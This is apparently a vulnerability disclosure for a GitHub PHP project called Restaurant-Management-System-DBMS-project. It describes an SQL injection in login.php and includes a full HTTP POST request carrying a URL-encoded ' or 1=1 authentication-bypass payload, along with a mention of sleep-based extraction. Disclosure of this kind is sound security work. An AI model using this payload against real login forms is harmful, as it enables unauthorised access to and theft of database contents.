system description

Our project is restaurant management system, where we provide all the details that a manager needs to run the restaurant from ordering the food to generating bill and payment. In our project only an authorised person i.e. manager can login, He can see the data of customers and employee. He can also add, update or delete customer. We have table masters who assigns table to the customers and chef who prepares food, also main feature is we calculate the time taken to serve customer food after order is placed. And we also have preparation time for each food individually. Chef also gets bonus if he prepares food early than expected, and customers are given more discount if food is delivered to them late as reward for their patience. We allocate table based on members and table masters does that job, also customer can prebook their table. Also, we keep a record of the employee who have left their table, like which employee left and when. Menu is displayed based on categories, like food with same category are displayed together. We also have record of increase in the price or ratings, like if food price is increased then old price and new price, and also ratings of food, like which food is trending and hitting our restaurant or which food is not doing well And we generate bill automatically based on order items, and we have got many payment options like cash, card, paytm, etc.

Github address: https://github.com/rajvi-patel-22/Restaurant-Management-System-DBMS-project

Vulnerability Description

There is an SQL injection vulnerability in Restaurant-Management-System-DBMS-project version 1.0 This vulnerability allows attackers to manipulate the application's database through specially crafted SQL query strings. Due to insufficient verification of user input, attackers can insert malicious SQL code into input fields, thereby bypassing authentication, accessing or modifying sensitive data in the database, and even performing database management operations

vulnerability analysis

in login.phpfile,The login statement has not been verified, and attackers can control SQL statements by concatenating single quotes, thereby causing SQL injection

image.png

Recurrence of vulnerabilities

In the login interface, database information can be obtained through universal password login or sleep delay

POST /login.php HTTP/1.1
Host: www.cvehhh.eek
Content-Length: 49
Cache-Control: max-age=0
Origin: <http://www.cvehhh.eek>
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Connection: keep-alive

username=1&password=abc123%27+or+1%3D1+limit+1%23

image.png

image.png